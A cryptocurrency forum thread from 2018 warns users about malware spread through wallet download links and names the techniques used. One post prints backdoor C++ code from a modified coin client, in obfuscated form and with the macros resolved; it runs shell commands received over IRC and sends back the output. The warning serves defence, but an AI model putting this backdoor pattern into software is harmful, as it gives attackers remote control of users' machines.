VVToken-RJG
Newbie
 Offline
Activity: 20
Merit: 0
|
 |
January 11, 2018, 01:07:59 PM |
|
Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.
Never forget that if you're not paying for the product, you ARE the product. |
|
|
|
|
JWKY
Member
Offline
Activity: 602
Merit: 13
|
|
January 12, 2018, 09:03:28 AM |
|
Then how people not IT knowledgeable like me detect any fake coin with malware wallet?
Any advise?
|
|
|
|
bcoinnn
Newbie
Offline
Activity: 4
Merit: 0
|
|
January 12, 2018, 06:48:24 PM |
|
Thanks for sharing!
|
|
|
|
|
JamesPTT
Newbie
Offline
Activity: 9
Merit: 0
|
|
January 13, 2018, 01:37:34 AM |
|
Thank you for sharing!  |
|
|
|
|
Sofinard09
Newbie
Offline
Activity: 109
Merit: 0
|
|
January 13, 2018, 08:03:54 AM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
} here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
} The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance. As you said virus scan no longer sufficient, any advice for android user ? Im kinda new to this. |
|
|
|
|
Reikun2
Newbie
Offline
Activity: 2
Merit: 0
|
|
January 13, 2018, 09:12:00 AM |
|
So to my understanding...no type of anti-virus software can stop this? Are there any new software for windows that can prevent this?? |
|
|
|
|
muscrypto13
Newbie
Offline
Activity: 38
Merit: 0
|
|
January 13, 2018, 04:48:00 PM |
|
great post ...thanks for sharing
I will add it to the black list
|
|
|
|
|
IcemanVan
Newbie
Offline
Activity: 27
Merit: 0
|
|
January 14, 2018, 12:17:08 AM |
|
Thank you guys for the very useful post - especially useful for all us newbies!  |
|
|
|
|
popoyuyun
Newbie
Offline
Activity: 152
Merit: 0
|
|
January 14, 2018, 05:38:32 AM |
|
This sounds really scary, but I guess that where is the money, there are also malversations
thanks for this information
|
|
|
|
|
|
jamirrah
|
|
January 14, 2018, 04:37:48 PM |
|
I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?
|
|
|
|
groggin
Legendary
Offline
Activity: 1894
Merit: 1001
|
|
January 15, 2018, 01:17:40 AM |
|
I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?
sounds like you might've cought something there. i've heard of a virus that replaces BTC addresses when pasting. no reason to panic, scan your pc, and remove the bug, i use clamwin + malwarebytes last resort backup your stuf and reinstall the OS after a full reformat |
|
|
|
andybits
Newbie
Offline
Activity: 27
Merit: 0
|
|
January 15, 2018, 11:30:03 AM |
|
Thanks for sharing, very helpful information.
|
|
|
|
|
|
iozver
|
|
January 16, 2018, 07:24:58 AM |
|
I have long ago on my own mistakes realized that opening any links is very unsafe. Therefore, I usually use either a sandbox for windows ( https://ru.wikipedia.org/wiki/Sandboxie) or a virtual machine. This is very useful in terms of security. |
|
|
|
|
mack2018
Newbie
Offline
Activity: 31
Merit: 0
|
|
January 16, 2018, 08:17:20 AM |
|
How do we stop this malware to infect our computers?
|
|
|
|
|
DiNamO
Newbie
Offline
Activity: 4
Merit: 0
|
|
January 16, 2018, 08:18:41 AM |
|
I have long ago on my own mistakes realized that opening any links is very unsafe. Therefore, I usually use either a sandbox for windows ( https://ru.wikipedia.org/wiki/Sandboxie) or a virtual machine. This is very useful in terms of security. Using bootable windows could also be an problem solver here. Thanks for spreading the word. |
|
|
|
|
ldarkl459
Newbie
Offline
Activity: 8
Merit: 0
|
|
January 16, 2018, 02:00:27 PM |
|
thanks for this very valuable info. but I'm just thinking is an antivirus like eset or kapersky not enough? I mean they are kind of decent anti-virus(malware) right? anyways thanks again. keep us informed in the future. thank you.
|
|
|
|
|
nthnode404
Member
Offline
Activity: 126
Merit: 10
Everything I say is in My Opinion Only!
|
|
January 16, 2018, 08:28:24 PM |
|
Its time to buy hardware wallets.
That is very sound advice! The Ledger Nano S is an excellent choice to protect against malware or ransomeware viruses. However, be careful who you buy it from. Get it from the manufacturer directly or from a licensed retailer. |
|
|
|
ricky68
Newbie
Offline
Activity: 26
Merit: 0
|
|
January 16, 2018, 11:57:31 PM |
|
some site have mining scrypts that mine monero
|
|
|
|
|
v3teran
Newbie
Offline
Activity: 107
Merit: 0
|
|
January 17, 2018, 07:09:00 PM |
|
Bitdefender+Malwarebytes+ADW Cleaner |
|
|
|
|
Naoris_Official
Newbie
Offline
Activity: 1
Merit: 0
|
|
January 18, 2018, 02:15:54 AM |
|
Appreciate the update. Any good stories about catching these guys?
|
|
|
|
|
|
